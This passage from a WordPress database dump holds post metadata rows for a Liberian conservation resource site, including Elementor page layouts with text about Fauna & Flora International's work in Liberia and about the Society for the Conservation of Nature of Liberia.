2956,'_elementor_controls_usage','a:0:{}'),(20175,2956,'_thumbnail_id','2957'),(20176,2956,'ocean_gallery_link_images','off'),(20177,2956,'ocean_sidebar','0'),(20178,2956,'ocean_second_sidebar','0'),(20179,2956,'ocean_disable_margins','enable'),(20180,2956,'ocean_display_top_bar','default'),(20181,2956,'ocean_display_header','default'),(20182,2956,'ocean_center_header_left_menu','0'),(20183,2956,'ocean_custom_header_template','0'),(20184,2956,'ocean_header_custom_menu','0'),(20185,2956,'ocean_menu_typo_font_family','0'),(20186,2956,'ocean_disable_title','default'),(20187,2956,'ocean_disable_heading','default'),(20188,2956,'ocean_disable_breadcrumbs','default'),(20189,2956,'ocean_display_footer_widgets','default'),(20190,2956,'ocean_display_footer_bottom','default'),(20191,2956,'ocean_custom_footer_template','0'),(20192,2956,'ocean_link_format_target','self'),(20193,2956,'ocean_quote_format_link','post'),(20194,2956,'osh_disable_topbar_sticky','default'),(20195,2956,'osh_disable_header_sticky','default'),(20196,2956,'osh_sticky_header_style','default'),(20197,2956,'_dp_original','2911'),(20198,2956,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103664;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3489;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:3127;}i:3;a:1:{s:2:\"id\";i:2801;}i:4;a:1:{s:2:\"id\";i:3710;}i:5;a:1:{s:2:\"id\";i:3297;}}}}'),(20199,2956,'_edit_lock','1598613857:42'),(20200,2957,'_wp_attached_file','2020/02/sis-pic.jpg'),(20201,2957,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:450;s:4:\"file\";s:19:\"2020/02/sis-pic.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"sis-pic-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"sis-pic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"sis-pic-768x346.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20204,2956,'_edit_last','42'),(20205,2428,'_jetpack_related_posts_cache','a:1:{s:32:\"d43a774567591c84a23e7dd43a677687\";a:2:{s:7:\"expires\";i:1580998231;s:7:\"payload\";a:0:{}}}'),(20206,2427,'_jetpack_related_posts_cache','a:1:{s:32:\"d43a774567591c84a23e7dd43a677687\";a:2:{s:7:\"expires\";i:1580998251;s:7:\"payload\";a:0:{}}}'),(20207,2429,'_jetpack_related_posts_cache','a:1:{s:32:\"d43a774567591c84a23e7dd43a677687\";a:2:{s:7:\"expires\";i:1580998276;s:7:\"payload\";a:0:{}}}'),(20208,487,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628851352;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:469;}i:1;a:1:{s:2:\"id\";i:468;}i:2;a:1:{s:2:\"id\";i:471;}}}}'),(20209,1608,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629047735;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1602;}i:1;a:1:{s:2:\"id\";i:1598;}i:2;a:1:{s:2:\"id\";i:1582;}}}}'),(20210,1749,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628103760;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3092;}i:1;a:1:{s:2:\"id\";i:1705;}i:2;a:1:{s:2:\"id\";i:1701;}}}}'),(20211,1737,'_jetpack_related_posts_cache','a:1:{s:32:\"ae2c7801ebc3b191cb58e427779c01bd\";a:2:{s:7:\"expires\";i:1628813973;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1739;}i:1;a:1:{s:2:\"id\";i:1741;}i:2;a:1:{s:2:\"id\";i:2148;}}}}'),(20212,1610,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629041406;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1614;}i:1;a:1:{s:2:\"id\";i:3083;}i:2;a:1:{s:2:\"id\";i:1598;}}}}'),(20213,1877,'_jetpack_related_posts_cache','a:1:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1629027089;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1870;}i:1;a:1:{s:2:\"id\";i:1872;}i:2;a:1:{s:2:\"id\";i:3664;}}}}'),(20214,1747,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628643086;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1722;}i:1;a:1:{s:2:\"id\";i:3285;}i:2;a:1:{s:2:\"id\";i:1711;}}}}'),(20215,1741,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628981932;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1722;}i:1;a:1:{s:2:\"id\";i:1697;}i:2;a:1:{s:2:\"id\";i:1734;}}}}'),(20216,1732,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628651170;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2159;}i:1;a:1:{s:2:\"id\";i:1743;}i:2;a:1:{s:2:\"id\";i:1770;}}}}'),(20217,1772,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627728312;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:1743;}i:2;a:1:{s:2:\"id\";i:3109;}}}}'),(20231,1720,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629033941;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1718;}i:1;a:1:{s:2:\"id\";i:1713;}i:2;a:1:{s:2:\"id\";i:1726;}}}}'),(20232,2963,'_wp_attached_file','2020/02/giz-logo.gif'),(20233,2963,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:236;s:6:\"height\";i:62;s:4:\"file\";s:20:\"2020/02/giz-logo.gif\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"giz-logo-150x62.gif\";s:5:\"width\";i:150;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20234,2964,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20235,2964,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20236,2964,'slide_template','default'),(20237,2964,'slide_template','default'),(20240,2964,'_elementor_template_type','wp-post'),(20241,2964,'_elementor_template_type','wp-post'),(20242,2964,'_elementor_version','2.8.1'),(20243,2964,'_elementor_version','2.8.1'),(20244,2964,'_wp_page_template','default'),(20245,2964,'_wp_page_template','default'),(20246,2964,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"medium\",\"caption\":\"Water, sanitation and hygiene\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20247,2964,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"medium\",\"caption\":\"Water, sanitation and hygiene\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20253,2964,'_dp_original','1614'),(20254,2964,'_edit_lock','1629233790:42'),(20255,2964,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1627733057;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1606;}i:1;a:1:{s:2:\"id\";i:3041;}i:2;a:1:{s:2:\"id\";i:1584;}}}}'),(20256,2965,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20257,2965,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20258,2965,'slide_template','default'),(20259,2965,'slide_template','default'),(20262,2965,'_elementor_template_type','wp-post'),(20263,2965,'_elementor_template_type','wp-post'),(20264,2965,'_elementor_version','2.7.5'),(20265,2965,'_elementor_version','2.7.5'),(20266,2965,'_wp_page_template','default'),(20267,2965,'_wp_page_template','default'),(20268,2965,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 